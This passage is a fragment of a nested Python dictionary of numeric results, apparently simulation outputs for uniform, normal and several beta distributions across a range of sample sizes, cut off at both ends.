0.10951015522976426, 'beta4': 0.049682092131381306}, 200: {'uni': 0.07720678728039648, 'nor': 0.14219389731717424, 'beta1': 0.07503079131267198, 'beta2': 0.12017019496462067, 'beta4': 0.061734503814410535}, 150: {'uni': 0.08848642196594714, 'nor': 0.1500355311895341, 'beta1': 0.08631984938429821, 'beta2': 0.12838525098850095, 'beta4': 0.0718410012841619}, 100: {'uni': 0.10657957938014417, 'nor': 0.16231407544099366, 'beta1': 0.10548271930091585, 'beta2': 0.14360421901255419, 'beta4': 0.08890819357084263}, 75: {'uni': 0.12258252780364842, 'nor': 0.1746077488797695, 'beta1': 0.12168422916715942, 'beta2': 0.15632646573417341, 'beta4': 0.10426763026201397}, 50: {'uni': 0.14824751171813622, 'nor': 0.19345539799865896, 'beta1': 0.14757982972276956, 'beta2': 0.1782320565559261, 'beta4': 0.12956990555575637}, 30: {'uni': 0.19007534797164194, 'nor': 0.22980066650049646, 'beta1': 0.18953145977057473, 'beta2': 0.21398344377916256, 'beta4': 0.17247209313506517}, 20: {'uni': 0.23051753895022453, 'nor': 0.2663268342701276, 'beta1': 0.2307327055958382, 'beta2': 0.2513386326841577, 'beta4': 0.21383795792710225}, 10: {'uni': 0.32014689511568667, 'nor': 0.34697266220274, 'beta1': 0.3237670049413221, 'beta2': 0.3357362830315301, 'beta4': 0.30748660519832094}}, 20: {1000: {'uni': 0.049274913203381954, 'nor': 0.14598076136064764, 'beta1': 0.04773172248544687, 'beta2': 0.10208044800903471, 'beta4': 0.02678894215396943}, 750: {'uni': 0.051859490365182094, 'nor': 0.14739225959074442, 'beta1': 0.047875305623994, 'beta2': 0.10544771824923445, 'beta4': 0.031169107205504698}, 500: {'uni': 0.058024976856876465, 'nor': 0.15193051514519595, 'beta1': 0.04839368483595815, 'beta2': 0.10979535020355546, 'beta4': 0.038016224370682805}, 400: {'uni': 0.062200844002211486, 'nor': 0.1537517807864368, 'beta1': 0.05344573741806791, 'beta2': 0.11432086453404405, 'beta4': 0.042678379119217236}, 300: {'uni': 0.06864694129034321, 'nor': 0.1588340869015541, 'beta1': 0.061657151171832125, 'beta2': 0.11908535230283115, 'beta4': 0.049311269074143405}, 200: {'uni': 0.08082515275880864, 'nor': 0.1653404286408089, 'beta1': 0.07528213929157085, 'beta2': 0.12905037545647996, 'beta4': 0.06078472833045673}, 150: {'uni': 0.09067340943954105, 'nor': 0.1719167421754575, 'beta1': 0.08654348956789837, 'beta2': 0.1377516058425463, 'beta4': 0.07049778930105871}, 100: {'uni': 0.1086666058987017, 'nor': 0.18582138140525045, 'beta1': 0.10555332688519786, 'beta2': 0.1520573786986546, 'beta4': 0.08771942043391467}, 75: {'uni': 0.12367516250114241, 'nor': 0.1936529244743188, 'beta1': 0.12127286264345238, 'beta2': 0.16320255408908907, 'beta4': 0.10226685365525778}, 50: {'uni': 0.14913935597178152, 'nor': 0.2158588407634494, 'beta1': 0.14842740385680675, 'beta2': 0.18610463716939651, 'beta4': 0.1264269525886395}, 30: {'uni': 0.1894435241919467, 'nor': 0.24698362415268657, 'beta1': 0.1902052475438244, 'beta2': 0.2208874403100017, 'beta4': 0.16740207123414985}, 20: {'uni': 0.23045459417674147, 'nor': 0.2799231266745311, 'beta1': 0.23095718339914606, 'beta2': 0.25625627348359864, 'beta4': 0.20847547734226834}, 10: {'uni': 0.3184035049947215, 'nor': 0.36156368323481775, 'beta1': 0.31812314781434214, 'beta2': 0.3366009664560641, 'beta4': 0.30273632497052144}}, 10: {1000: {'uni': 0.08279938794024366, 'nor': 0.20746864987159275, 'beta1': 0.08963877760273378, 'beta2': 0.13088236164799233, 'beta4': 0.02673844765905936}, 750: {'uni': 0.08426832961599184, 'nor': 0.20874280374404391, 'beta1': 0.08955811722492701, 'beta2': 0.13542495464202575, 'beta4': 0.03080220729065536}, 500: {'uni': 0.08659140770361992, 'nor': 0.21132286282870372, 'beta1': 0.08971002227585745, 'beta2': 0.137474594046657, 'beta4': 0.03774600933075223}, 400: {'uni': 0.08845482467918225, 'nor': 0.21371189689386383, 'beta1': 0.0897073855362439, 'beta2': 0.14244766972162892, 'beta4': 0.0421496940463395}, 300: {'uni': 0.09163999186977767, 'nor': 0.21681989561836174, 'beta1': 0.089886875954427, 'beta2': 0.14494850873515852, 'beta4': 0.048801996044743334}, 200: {'uni': 0.09824982646268379, 'nor': 0.2229381862621922, 'beta1': 0.09064463588385452, 'beta2': 0.15207622316955471, 'beta4': 0.05991506202414604}, 150: {'uni': 0.10597878355719062, 'nor': 0.22906946762966052, 'beta1': 0.0914691379185335, 'beta2': 0.15947859758245603, 'beta4': 0.06920496232883624}, 100: {'uni': 0.1204073194961825, 'nor': 0.23747551585427307, 'beta1': 0.10577014356758019, 'beta2': 0.17148307936029666, 'beta4': 0.08496381763696761}, 75: {'uni': 0.1334590836264363, 'nor': 0.2501046310309356, 'beta1': 0.12291423498596181, 'beta2': 0.1820777815006388, 'beta4': 0.09937452733840269}, 50: {'uni': 0.15659478623743123, 'nor': 0.2649487192543656, 'beta1': 0.14785603195288383, 'beta2': 0.20366919537172168, 'beta4': 0.12201244106590736}, 30: {'uni': 0.19399803736356186, 'nor': 0.29471369014840654, 'beta1': 0.18900850606731456, 'beta2': 0.23377561600860308, 'beta4': 0.15979617861494677}, 20: {'uni': 0.2327209769876345, 'nor': 0.3216648320505805, 'beta1': 0.22968888409928068, 'beta2': 0.2662874109164176, 'beta4': 0.19955725481302533}, 10: {'uni': 0.3167985271399704, 'nor': 0.3980931466618715, 'beta1': 0.3167971014813921, 'beta2': 0.34276356880144665, 'beta4': 0.28980968413230446}}}, 0.25: {1000: {1000: {'uni': 0.03199275137995117, 'nor': 0.0377612558253515, 'beta1': 0.03207386640216253, 'beta2': 0.051317660480200256, 'beta4': 0.029150123111011506}, 750: {'uni': 0.036938790221011875, 'nor': 0.042241745609793546, 'beta1': 0.03708565565300198, 'beta2': 0.05311937295175995, 'beta4': 0.034313693230411}, 500: {'uni': 0.04518467957852923, 'nor': 0.04973246769105877, 'beta1': 0.045095608233479745, 'beta2': 0.0579300692476834, 'beta4': 0.04254589117113883}, 400: {'uni': 0.0502034071958003, 'nor': 0.05454115588980907, 'beta1': 0.05055080954159219, 'beta2': 0.061161550088231986, 'beta4': 0.04797066239068751}, 300: {'uni': 0.058494397771818585, 'nor': 0.062028740711859265, 'beta1': 0.05833380007137132, 'beta2': 0.06798358010263028, 'beta4': 0.05630460494121223}, 200: {'uni': 0.07096438668841598, 'nor': 0.07412020377216044, 'beta1': 0.07133115327499512, 'beta2': 0.07896884752622757, 'beta4': 0.06907818308168096}, 150: {'uni': 0.08208505648349079, 'nor': 0.08447429233523951, 'beta1': 0.08184669107075387, 'beta2': 0.08801509549599151, 'beta4': 0.07992744012646691}, 100: {'uni': 0.10004565549548194, 'nor': 0.10237522390461173, 'beta1': 0.0999275224639195, 'beta2': 0.10532128217368142, 'beta4': 0.0988563106856703}, 75: {'uni': 0.11589185212999692, 'nor': 0.11807251171646749, 'beta1': 0.11485210164860138, 'beta2': 0.12031055325904372, 'beta4': 0.11412331652115923}, 50: {'uni': 0.14049191983680576, 'nor': 0.14195558645235828, 'beta1': 0.14048079336364855, 'beta2': 0.14452775406933738, 'beta4': 0.13989919886563593}, 30: {'uni': 0.18085720286815, 'nor': 0.18147395490124796, 'beta1': 0.1801423435578804, 'beta2': 0.1829095154193338, 'beta4': 0.17865742454053038}, 20: {'uni': 0.2188793664518785, 'nor': 0.2205153587206411, 'beta1': 0.2189194895346508, 'beta2': 0.2208849473005658, 'beta4': 0.21926359723489885}, 10: {'uni': 0.30590762068535415, 'nor': 0.3074011033419454, 'beta1': 0.3065343123341402, 'beta2': 0.3079808039413954, 'beta4': 0.3041198788346453}}, 750: {1000: {'uni': 0.032368347030127004, 'nor': 0.039495932165949266, 'beta1': 0.032127527217265195, 'beta2': 0.05096820210071745, 'beta4': 0.028616305560898614}, 750: {'uni': 0.03713885168013714, 'nor': 0.043817159608602774, 'beta1': 0.0367837672562607, 'beta2': 0.05312860283337206, 'beta4': 0.033712076422947546}, 500: {'uni': 0.04514502478230087, 'nor': 0.050939113474436026, 'beta1': 0.04537187336954829, 'beta2': 0.05849377906681347, 'beta4': 0.04188494892464878}, 400: {'uni': 0.050330802291682186, 'nor': 0.055505230954840445, 'beta1': 0.050734669077095895, 'beta2': 0.06247764901879249, 'beta4': 0.04742928078021369}, 300: {'uni': 0.05864673808177773, 'nor': 0.06291114299630962, 'beta1': 0.05852603179278021, 'beta2': 0.06804203235154582, 'beta4': 0.05550944554210635}, 200: {'uni': 0.07110774959507277, 'nor': 0.0750417803744845, 'beta1': 0.07108558678723764, 'beta2': 0.07979409652007075, 'beta4': 0.06858026018509678}, 150: {'uni': 0.08247125828473023, 'nor': 0.08547463541022982, 'beta1': 0.08215710788274455, 'beta2': 0.08848680474820936, 'beta4': 0.0796438596153346}, 100: {'uni': 0.10109208297439909, 'nor': 0.10352781679515655, 'beta1': 0.1006336182710834, 'beta2': 0.10634244051752054, 'beta4': 0.09786482796671303}, 75: {'uni': 0.11522357484837831, 'nor': 0.11827499297282096, 'beta1': 0.1159196515430023, 'beta2': 0.12014424072164931, 'beta4': 0.11380644122735906}, 50: {'uni': 0.14060642168956575, 'nor': 0.1432810536145968, 'beta1': 0.1404685185904413, 'beta2': 0.14445981166680172, 'beta4': 0.14025485753096134}, 30: {'uni': 0.18144382340878018, 'nor': 0.18220171362137827, 'beta1': 0.18019204096546904, 'beta2': 0.18336020074753134, 'beta4': 0.17996933419550307}, 20: {'uni': 0.2198405269160041, 'nor': 0.21972983923644784, 'beta1': 0.2207144033629308, 'beta2': 0.22254113568844458, 'beta4': 0.21995845947855397}, 10: {'uni': 0.30707583033219277, 'nor': 0.30677572835070843, 'beta1': 0.307186086020681, 'beta2': 0.3087181699800424, 'beta4': 0.30403958473809867}}, 500: {1000: {'uni': 0.031998610331581856, 'nor': 0.04277431287550973, 'beta1': 0.03202380702522861, 'beta2': 0.053247212628520835, 'beta4': 0.028106826865999635}, 750: {'uni': 0.0368150729172666, 'nor': 0.046175305332631256, 'beta1': 0.036955925234784415, 'beta2': 0.055430828654678854, 'beta4': 0.033006186200381704}, 500: {'uni': 0.045327422254650696, 'nor': 0.053320028563376476, 'beta1': 0.04521124170257684, 'beta2': 0.06079825113216919, 'beta4': 0.04125585885231965}, 400: {'uni': 0.05058625293211194, 'nor': 0.05811521301238065, 'beta1': 0.05047854919479744, 'beta2': 0.0644472021193534, 'beta4': 0.04657197609011046}, 300: {'uni': 0.05837680448123017, 'nor': 0.06554961214753685, 'beta1': 0.05832160254575547, 'beta2': 0.07045708483321578, 'beta4': 0.05450035709303813}, 200: {'uni': 0.07137488269124403, 'nor': 0.0765816734100554, 'beta1': 0.07097260906025193, 'beta2': 0.08122687128901757, 'beta4': 0.06810904430297748}, 150: {'uni': 0.08171768121444029, 'nor': 0.08706245424314168, 'beta1': 0.08224852816102035, 'beta2': 0.09206848284106278, 'beta4': 0.07864927350348105}, 100: {'uni': 0.10001354205421553, 'nor': 0.10494588642600383, 'beta1': 0.10032083676885117, 'beta2': 0.1073252427285255, 'beta4': 0.09755420704181944}, 75: {'uni': 0.11496296171371789, 'nor': 0.11892336415280835, 'beta1': 0.11573445907704838, 'beta2': 0.1221024266233946, 'beta4': 0.11312234604041477}, 50: {'uni': 0.1406991966723249, 'nor': 0.14434822688745969, 'beta1': 0.1408991819394264, 'beta2': 0.14576451960892592, 'beta4': 0.1390064572124975}, 30: {'uni': 0.18087047323939087, 'nor': 0.1829040634798727, 'beta1': 0.18054920049463752, 'beta2': 0.18399230494708463, 'beta4': 0.17823513722522538}, 20: {'uni': 0.21939938602159992, 'nor': 0.22182287755317703, 'beta1': 0.22045130781379252, 'beta2': 0.22290813512523416, 'beta4': 0.21814484703021253}, 10: {'uni': 0.3060836645742364, 'nor': 0.3091515297248897, 'beta1': 0.3066663173709814, 'beta2': 0.3075083864383387, 'beta4': 0.30422501574238897}}, 400: {1000: {'uni': 0.032005088669465276, 'nor': 0.04456557950368989, 'beta1': 0.03207047760229875, 'beta2': 0.05335428637134554, 'beta4': 0.02764205849240342}, 750: {'uni': 0.03707438658946127, 'nor': 0.048852635452191456, 'beta1': 0.037059120244776866, 'beta2': 0.05545369912568332, 'beta4': 0.03250465520660134}, 500: {'uni': 0.04527161577889338, 'nor': 0.05510988745673151, 'beta1': 0.0454293101810781, 'beta2': 0.061105496120222313, 'beta4': 0.04074431956109695}, 400: {'uni': 0.05033443638682883, 'nor': 0.059551554506442894, 'beta1': 0.050241105416355736, 'beta2': 0.06506528423110045, 'beta4': 0.045759081418304426}, 300: {'uni': 0.058211459729823334, 'nor': 0.06646450082163013, 'beta1': 0.05824726492475796, 'beta2': 0.07136706424691125, 'beta4': 0.05371853302556494}, 200: {'uni': 0.07136004884006591, 'nor': 0.07847889640933037, 'beta1': 0.07119158271516751, 'beta2': 0.0828087241613199, 'beta4': 0.066989888959891}, 150: {'uni': 0.08226981215061391, 'nor': 0.08787491015723636, 'beta1': 0.0820213556261612, 'beta2': 0.0922395433103187, 'beta4': 0.0782455680987506}, 100: {'uni': 0.0999425967371041, 'nor': 0.1055486790460004, 'beta1': 0.09960125420912624, 'beta2': 0.1088178339306568, 'beta4': 0.09699734407107313}, 75: {'uni': 0.11616131437111837, 'nor': 0.11979183643647795, 'beta1': 0.11556364812719394, 'beta2': 0.12237760407249698, 'beta4': 0.1124749001044939}, 50: {'uni': 0.14107921330185552, 'nor': 0.14436563346328762, 'beta1': 0.14060580635640263, 'beta2': 0.14613157564214374, 'beta4': 0.13891710396762352}, 30: {'uni': 0.18030508328138095, 'nor': 0.18482261222058646, 'beta1': 0.18024669252888958, 'beta2': 0.18503042752212556, 'beta4': 0.17833798147699706}, 20: {'uni': 0.21972895156921568, 'nor': 0.22310165064904985, 'beta1': 0.21906869562507247, 'beta2': 0.2237444999736099, 'beta4': 0.21783462233689643}, 10: {'uni': 0.3045782011808965, 'nor': 0.30585595084735995, 'beta1': 0.3062967507461382, 'beta2': 0.30905483197965655, 'beta4': 0.3053249816659628}}, 300: {1000: {'uni': 0.032239084457734934, 'nor': 0.04761428127094802, 'beta1': 0.032038173010609405, 'beta2': 0.05574065007123413, 'beta4': 0.027269701240414}, 750: {'uni': 0.037163331746985356, 'nor': 0.05159782362000957, 'beta1': 0.03687151259245286, 'beta2': 0.057493247342013665, 'beta4': 0.032126332878003705}, 500: {'uni': 0.04518027895134363, 'nor': 0.05830373631162644, 'beta1': 0.045342369983153, 'beta2': 0.06302093871729986, 'beta4': 0.03992543574842056}, 400: {'uni': 0.05041660540845222, 'nor': 0.06273062597571621, 'beta1': 0.050506925792484725, 'beta2': 0.06679374494442292, 'beta4': 0.0453809683918249}, 300: {'uni': 0.05819791840262872, 'nor': 0.06889853173644056, 'beta1': 0.05881589576054247, 'beta2': 0.07548404171599854, 'beta4': 0.05330460648413682}, 200: {'uni': 0.07099409803866191, 'nor': 0.08015771733382343, 'beta1': 0.07149914372253519, 'beta2': 0.08491818197910528, 'beta4': 0.0660207111886566}, 150: {'uni': 0.08165348909753622, 'nor': 0.09041841839558967, 'beta1': 0.08186412904658036, 'beta2': 0.09446598626929148, 'beta4': 0.07704328735244007}, 100: {'uni': 0.10032050128616843, 'nor': 0.10736683019992799, 'beta1': 0.10052095271344208, 'beta2': 0.11016773078480463, 'beta4': 0.09642704867227114}, 75: {'uni': 0.11561316546647915, 'nor': 0.12094802011662908, 'beta1': 0.11523834024523168, 'beta2': 0.12439262057779943, 'beta4': 0.11152777353064466}, 50: {'uni': 0.14018486722638512, 'nor': 0.14571982545039386, 'beta1': 0.14112158063583297, 'beta2': 0.1477125646402092, 'beta4': 0.13703508806923154}, 30: {'uni': 0.18072304976823583, 'nor': 0.1846706102625543, 'beta1': 0.18032073445217073, 'beta2': 0.18543660392632166, 'beta4': 0.1774188167718942}, 20: {'uni': 0.22002473058377936, 'nor': 0.22233988983477326, 'beta1': 0.219611410295673, 'beta2': 0.2238362766248162, 'beta4': 0.21760444529561554}, 10: {'uni': 0.30592439821930945, 'nor': 0.3083597959740417, 'beta1': 0.3068948351628876, 'beta2': 0.3076071685456584, 'beta4': 0.3053936839900976}}, 200: {1000: {'uni': 0.032145127804773244, 'nor': 0.05349333747510293, 'beta1': 0.0319567056231127, 'beta2': 0.05863229193574737, 'beta4': 0.02689596641142078}, 750: {'uni': 0.03706566197402705, 'nor': 0.05686923973969488, 'beta1': 0.03685443931928145, 'beta2': 0.061233105783269015, 'beta4': 0.03135246921457169}, 500: {'uni': 0.045287310383440804, 'nor': 0.06333268823272437, 'beta1': 0.04543966891783402, 'beta2': 0.06633448987394563, 'beta4': 0.039157769206374704}, 400: {'uni': 0.05058001358487568, 'nor': 0.06756534858480051, 'beta1': 0.05056634568175178, 'beta2': 0.07314321695984138, 'beta4': 0.04408417011680896}, 300: {'uni': 0.0584055924161348, 'nor': 0.07369190108393786, 'beta1': 0.05857816948096051, 'beta2': 0.07848195518441148, 'beta4': 0.05169771628815578}, 200: {'uni': 0.07130150466307517, 'nor': 0.08467495205397024, 'beta1': 0.07127183814358251, 'beta2': 0.0881972753860466, 'beta4': 0.06459411653988484}, 150: {'uni': 0.08230542143096298, 'nor': 0.09388689821838958, 'beta1': 0.0823575524673264, 'beta2': 0.09843414713564969, 'beta4': 0.07600083070681307}, 100: {'uni': 0.09992259917931273, 'nor': 0.11061606520328848, 'beta1': 0.10091421972922207, 'beta2': 0.11274797159715078, 'beta4': 0.09405990854917767}, 75: {'uni': 0.1146453681089189, 'nor': 0.1243577334515438, 'beta1': 0.11572896766854551, 'beta2': 0.126786382446473, 'beta4': 0.10989836905325345}, 50: {'uni': 0.1408283945272606, 'nor': 0.14854443655662386, 'beta1': 0.14077373626256007, 'beta2': 0.15015510894940037, 'beta4': 0.1362970789621657}, 30: {'uni': 0.18065144082287762, 'nor': 0.18602556667128156, 'beta1': 0.18024583757633306, 'beta2': 0.187119560361907, 'beta4': 0.1768157942624079}, 20: {'uni': 0.21915855466007622, 'nor': 0.2250505751776598, 'beta1': 0.21842255121376986, 'beta2': 0.2247693098465804, 'beta4': 0.21625303838766974}, 10: {'uni': 0.3069805298827638, 'nor': 0.3088397242466276, 'beta1': 0.3053746544466997, 'beta2': 0.3098571203920325, 'beta4': 0.30339983933013226}}, 150: {1000: {'uni': 0.03222316489755345, 'nor': 0.05945194607376453, 'beta1': 0.03207935408945817, 'beta2': 0.06079634191773392, 'beta4': 0.026527269808695464}, 750: {'uni': 0.0370321650244374, 'nor': 0.0617883925674626, 'beta1': 0.03711700730448053, 'beta2': 0.06372190827907176, 'beta4': 0.03096740102793627}, 500: {'uni': 0.04532144365663909, 'nor': 0.0680586194258842, 'beta1': 0.04536848896627477, 'beta2': 0.07251693015188532, 'beta4': 0.03866327712014228}, 400: {'uni': 0.0505977822228203, 'nor': 0.07203749527198017, 'beta1': 0.050685474943401365, 'beta2': 0.07485785669758882, 'beta4': 0.04352869184910363}, 300: {'uni': 0.057965032685755036, 'nor': 0.07790764637502356, 'beta1': 0.058658948406533795, 'beta2': 0.08098586671063707, 'beta4': 0.050983529052287424}, 200: {'uni': 0.0710371027428352, 'nor': 0.08820871252384349, 'beta1': 0.07148282244840176, 'beta2': 0.0914952470037026, 'beta4': 0.06346089963043011}, 150: {'uni': 0.08207640995751564, 'nor': 0.09766509211855923, 'beta1': 0.08167656775849508, 'beta2': 0.10012999401461498, 'beta4': 0.07427821448227956}, 100: {'uni': 0.09994734914200143, 'nor': 0.1129459883944704, 'beta1': 0.09980539436202157, 'beta2': 0.11592632608795883, 'beta4': 0.09304062628193266}, 75: {'uni': 0.11553236151223506, 'nor': 0.1273360867115455, 'beta1': 0.11561304775458114, 'beta2': 0.12896122578621239, 'beta4': 0.10856651888369684}, 50: {'uni': 0.1401267895773386, 'nor': 0.150874223818793, 'beta1': 0.14106509605862422, 'beta2': 0.15309480271707476, 'beta4': 0.13434799522511576}, 30: {'uni': 0.18100210887716317, 'nor': 0.18846250113659102, 'beta1': 0.18108600475737724, 'beta2': 0.18820408383757903, 'beta4': 0.1744893497548229}, 20: {'uni': 0.22007531711429196, 'nor': 0.22624986333580377, 'beta1': 0.22105754134774402, 'beta2': 0.2254264398404922, 'beta4': 0.21671616234795646}, 10: {'uni': 0.30579411743746077, 'nor': 0.31037044747734677, 'beta1': 0.30727843528835264, 'beta2': 0.3098797929188794, 'beta4': 0.30316988477280543}}, 100: {1000: {'uni': 0.03274216345456671, 'nor': 0.06775327941395048, 'beta1': 0.032061342840036255, 'beta2': 0.06382316122578824, 'beta4': 0.026316312803939867}, 750: {'uni': 0.037579409945831976, 'nor': 0.07067264993908817, 'beta1': 0.036944834310432384, 'beta2': 0.06667491200402953, 'beta4': 0.03049780432266838}, 500: {'uni': 0.045626044711458535, 'nor': 0.07640799770080187, 'beta1': 0.045208821668136, 'beta2': 0.07491373191518652, 'beta4': 0.03785430223359623}, 400: {'uni': 0.05090625729095505, 'nor': 0.07934795957920815, 'beta1': 0.05066551543139719, 'beta2': 0.07868508780911171, 'beta4': 0.04264742804290289}, 300: {'uni': 0.05839819477500041, 'nor': 0.08457660157789437, 'beta1': 0.05827469063418195, 'beta2': 0.0836305486592761, 'beta4': 0.05014012449638705}, 200: {'uni': 0.07131120343453617, 'nor': 0.09564864803002038, 'beta1': 0.07121453603448036, 'beta2': 0.09501904926088, 'beta4': 0.06199710926061397}, 150: {'uni': 0.0824632894282834, 'nor': 0.10351775253135054, 'beta1': 0.08222593298518815, 'beta2': 0.10403737737010954, 'beta4': 0.07317445595779534}, 100: {'uni': 0.10027559659721097, 'nor': 0.11911693503739967, 'beta1': 0.10035631836386402, 'beta2': 0.11905850690926911, 'beta4': 0.09115925777533135}, 75: {'uni': 0.11533926378096324, 'nor': 0.13293086862293707, 'beta1': 0.11550021587841142, 'beta2': 0.13242283015048073, 'beta4': 0.10583595257901535}, 50: {'uni': 0.14125461490836977, 'nor': 0.15481343079067678, 'beta1': 0.14083804530729904, 'beta2': 0.15486187856446598, 'beta4': 0.13213869045119073}, 30: {'uni': 0.18067693462898593, 'nor': 0.19209904272032094, 'beta1': 0.18048591905655675, 'beta2': 0.19132292898534176, 'beta4': 0.1731204060059379}, 20: {'uni': 0.2194497761344132, 'nor': 0.22952776186358645, 'beta1': 0.2210084936336856, 'beta2': 0.2277523801643781, 'beta4': 0.21401777417550116}, 10: {'uni': 0.30491836630916047, 'nor': 0.3136863210929642, 'beta1': 0.3059618384293903, 'beta2': 0.31145305621358244, 'beta4': 0.30218740315401166}}, 75: {1000: {'uni': 0.03296804299574074, 'nor': 0.07502584510325999, 'beta1': 0.03198909471182765, 'beta2': 0.06627849631603855, 'beta4': 0.026018303221585604}, 750: {'uni': 0.03781889522611104, 'nor': 0.07750171416392093, 'beta1': 0.03709295438746274, 'beta2': 0.06966374591084012, 'beta4': 0.030083456649105722}, 500: {'uni': 0.04588611395620795, 'nor': 0.0832308871539903, 'beta1': 0.04503188517914297, 'beta2': 0.0778680999061172, 'beta4': 0.037422494765473796}, 400: {'uni': 0.05103896713119821, 'nor': 0.08624943932637474, 'beta1': 0.050515142768203625, 'beta2': 0.08092558102345371, 'beta4': 0.04214991872531762}, 300: {'uni': 0.058619489540432834, 'nor': 0.09218377722158483, 'beta1': 0.05833566460055162, 'beta2': 0.08767072534918796, 'beta4': 0.04948056049731009}, 200: {'uni': 0.07142937649921666, 'nor': 0.10153881530955883, 'beta1': 0.0711962247024438, 'beta2': 0.09878624986895768, 'beta4': 0.06114388931769735}, 150: {'uni': 0.0818160837503934, 'nor': 0.10962021535420124, 'beta1': 0.0821248472699912, 'beta2': 0.10678592690352856, 'beta4': 0.07201635109029625}, 100: {'uni': 0.10033935923350429, 'nor': 0.12400158701587738, 'beta1': 0.10019144115697398, 'beta2': 0.12257338875860513, 'beta4': 0.08958751642761531}, 75: {'uni': 0.11463620909947292, 'nor': 0.13729280250456427, 'beta1': 0.11545358481112064, 'beta2': 0.13533805566311075, 'beta4': 0.10463860294573568}, 50: {'uni': 0.14041083829724632, 'nor': 0.1601934699301324, 'beta1': 0.14118094481810134, 'beta2': 0.15649100485487455, 'beta4': 0.13079204536225447}, 30: {'uni': 0.17941841118483848, 'nor': 0.19432333539672053, 'beta1': 0.18108637707222786, 'beta2': 0.1940514148883128, 'beta4': 0.17116345309006809}, 20: {'uni': 0.2191045954547003, 'nor': 0.23156916864980065, 'beta1': 0.21958539239874875, 'beta2': 0.2288693020710007, 'beta4': 0.2111983732891391}, 10: {'uni': 0.3076647019304655, 'nor': 0.3173691048923303, 'beta1': 0.30576781526816577, 'beta2': 0.3130098845736485, 'beta4': 0.2972158297961716}}, 50: {1000: {'uni': 0.03433430022899808, 'nor': 0.08842102532667545, 'beta1': 0.03223331907376098, 'beta2': 0.07277518065743305, 'beta4': 0.02588821628662097}, 750: {'uni': 0.03887126446259914, 'nor': 0.0910846873593219, 'beta1': 0.036951578170920873, 'beta2': 0.07622969912474264, 'beta4': 0.03006036248745808}, 500: {'uni': 0.04689196532878104, 'nor': 0.09593657648017129, 'beta1': 0.04503241099014954, 'beta2': 0.08323295043032963, 'beta4': 0.03714881820594479}, 400: {'uni': 0.051774246404964364, 'nor': 0.09916078860193034, 'beta1': 0.0505571321231062, 'beta2': 0.08730017553432268, 'beta4': 0.04159182778940329}, 300: {'uni': 0.059150975430708325, 'nor': 0.10379530845713192, 'beta1': 0.05822224483584626, 'beta2': 0.09363761776791535, 'beta4': 0.04832173433265907}, 200: {'uni': 0.0716859637391355, 'nor': 0.11234734351192865, 'beta1': 0.07094419045693312, 'beta2': 0.10324004723700275, 'beta4': 0.059980305787279864}, 150: {'uni': 0.08266517102902693, 'nor': 0.12043265249847296, 'beta1': 0.08183417503139817, 'beta2': 0.11217584960878624, 'beta4': 0.07046469195355531}, 100: {'uni': 0.10054768121870128, 'nor': 0.13395983977474127, 'beta1': 0.09972911370096887, 'beta2': 0.12640535172959536, 'beta4': 0.08769745435863463}, 75: {'uni': 0.11506440143566307, 'nor': 0.1461475325877074, 'beta1': 0.11504294118932046, 'beta2': 0.1391005160652219, 'beta4': 0.10257774239474937}, 50: {'uni': 0.1405096759295903, 'nor': 0.16839269038201765, 'beta1': 0.13993583438148083, 'beta2': 0.16161227714177773, 'beta4': 0.12805930575607483}, 30: {'uni': 0.18017995907272144, 'nor': 0.20200364133487392, 'beta1': 0.18055279602385688, 'beta2': 0.19608371098558458, 'beta4': 0.1683674379324781}, 20: {'uni': 0.21805138604748409, 'nor': 0.23779035600849233, 'beta1': 0.21986203616531452, 'beta2': 0.23327926081944855, 'beta4': 0.2082804112449691}, 10: {'uni': 0.3040705295399263, 'nor': 0.32031549693696865, 'beta1': 0.3066804021631311, 'beta2': 0.31327311772302824, 'beta4': 0.2972068392863597}}, 30: {1000: {'uni': 0.03871017016879641, 'nor': 0.11049883217909062, 'beta1': 0.032247812148711405, 'beta2': 0.0805454176845462, 'beta4': 0.02559841016582587}, 750: {'uni': 0.042769108003219106, 'nor': 0.11296398305504446, 'beta1': 0.03699026418458462, 'beta2': 0.08466666160065073, 'beta4': 0.02979787689834079}, 500: {'uni': 0.04978362867791797, 'nor': 0.11784520617150873, 'beta1': 0.045160080333170705, 'beta2': 0.09071832655647427, 'beta4': 0.03657944795279622}, 400: {'uni': 0.054244251799578425, 'nor': 0.120664612299139, 'beta1': 0.05055449392108258, 'beta2': 0.09478104392591502, 'beta4': 0.041067052741879134}, 300: {'uni': 0.06146708324946404, 'nor': 0.12458558674066761, 'beta1': 0.05823153766200054, 'beta2': 0.10042052998914, 'beta4': 0.04754493134712555}, 200: {'uni': 0.07360874613430221, 'nor': 0.1329409951894065, 'beta1': 0.0712112137494094, 'beta2': 0.11080986220563926, 'beta4': 0.05867823822711815}, 150: {'uni': 0.08397023944800297, 'nor': 0.1390438256951947, 'beta1': 0.08237631752937374, 'beta2': 0.11918607548226523, 'beta4': 0.06866317554335899}, 100: {'uni': 0.10128809169151631, 'nor': 0.1517267646035071, 'beta1': 0.09972424769262522, 'beta2': 0.1354500191068707, 'beta4': 0.0849190667878878}, 75: {'uni': 0.11597845714700927, 'nor': 0.16309000570623827, 'beta1': 0.11559498237300614, 'beta2': 0.14589154324925346, 'beta4': 0.0999162933165636}, 50: {'uni': 0.14069800262255838, 'nor': 0.1839187462219669, 'beta1': 0.13981209728742372, 'beta2': 0.16778239734387568, 'beta4': 0.12425346462613163}, 30: {'uni': 0.1797446733169624, 'nor': 0.21644972902621398, 'beta1': 0.18059243359809551, 'beta2': 0.20202152261026132, 'beta4': 0.1636678723512469}, 20: {'uni': 0.21937480663500575, 'nor': 0.2497527953300106, 'beta1': 0.21979044357993877, 'beta2': 0.2359411650840486, 'beta4': 0.20332953036428597}, 10: {'uni': 0.30351794338910415, 'nor': 0.329349286588422, 'beta1': 0.3059412686044445, 'beta2': 0.31726353751068403, 'beta4': 0.291909252822552}}, 20: {1000: {'uni': 0.04786473758448062, 'nor': 0.13448854973910773, 'beta1': 0.0474900351548871, 'beta2': 0.09274155108383075, 'beta4': 0.025530278131800782}, 750: {'uni': 0.05039616783397134, 'nor': 0.135064704569215, 'beta1': 0.04765005160770225, 'beta2': 0.09674441211509341, 'beta4': 0.029683541983339667}, 500: {'uni': 0.05547762205023854, 'nor': 0.14001720599630382, 'beta1': 0.048106962180010204, 'beta2': 0.09953924927118829, 'beta4': 0.036370817128490524}, 400: {'uni': 0.05974197156622235, 'nor': 0.14172064957995056, 'beta1': 0.050872352437056095, 'beta2': 0.10418161630558852, 'beta4': 0.040764857091411755}, 300: {'uni': 0.06524051543131026, 'nor': 0.14595220600119096, 'beta1': 0.05848865491478826, 'beta2': 0.10998005813512912, 'beta4': 